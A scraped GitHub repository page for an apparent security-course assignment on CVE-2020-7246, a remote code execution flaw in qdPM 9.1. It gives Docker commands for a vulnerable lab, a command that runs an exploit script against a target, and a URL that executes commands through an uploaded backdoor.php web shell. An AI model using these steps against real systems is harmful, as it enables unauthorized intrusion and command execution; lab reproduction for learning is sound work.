CVE-2020-7246 (qdPM 9.1)

For educational purposes only.

See Reference for the details.

Run

$ git clone https://github.com/arafatansari/SecAssignment.git
$ cd SecAssignment
$ docker build -t cve-assignment:ine .
$ docker run -it -p 80:80 cve-assignment:ine
$ service apache2 start | service mysql start

Exploit

$ python Exploit/exploit.py -url http://{target-ip}/qdpm/ -u test@localhost.com -p password

Check (exploited)

$ http://{target-ip}/qdpm/uploads/users/xxxx-backdoor.php?cmd=whoami

Name		Name	Last commit message	Last commit date
Latest commit History 5 Commits
Exploit		Exploit
Dockerfile		Dockerfile
RCE_CVE-2020-7246.jpg		RCE_CVE-2020-7246.jpg
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Exploit

Exploit

Dockerfile

Dockerfile

RCE_CVE-2020-7246.jpg

RCE_CVE-2020-7246.jpg

README.md

README.md

Repository files navigation

CVE-2020-7246 (qdPM 9.1)

Run

Exploit

Check (exploited)

About

Releases

Packages

Languages

arafatansari/SecAssignment

Folders and files

Latest commit

History

Repository files navigation

CVE-2020-7246 (qdPM 9.1)

Run

Exploit

Check (exploited)

About

Resources

Stars

Watchers

Forks

Languages